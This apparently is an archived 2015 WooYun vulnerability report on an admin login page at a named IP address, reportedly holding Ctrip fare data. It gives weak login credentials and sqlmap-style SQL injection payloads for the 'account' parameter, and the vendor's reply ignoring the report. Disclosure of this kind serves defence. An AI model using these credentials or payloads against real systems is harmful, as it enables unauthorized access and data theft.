乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经主动忽略漏洞,细节向公众公开
从后台可获知携程低价政策及用户搜索的行程请求等等信息...
Url:http://121.201.34.104/admin/login.php accountDBA权限:
弱口令:admin / admin && ctrip / ctrip
Payload:
Parameter: account (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: done=&account=admin' RLIKE (SELECT (CASE WHEN (3661=3661) THEN 0x61646d696e ELSE 0x28 END)) AND 'XSWF'='XSWF&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4 Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: done=&account=admin' AND (SELECT 9467 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(9467=9467,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sMbe'='sMbe&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: done=&account=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))uOwx) AND 'XHgB'='XHgB&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4 Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
增强 && 过滤
危害等级:无影响厂商忽略
忽略时间:2015-12-21 13:49
感谢您对此漏洞信息的提交,此漏洞为第三方供应商的漏洞问题,不会读取携程自己的数据库,已忽略。
暂无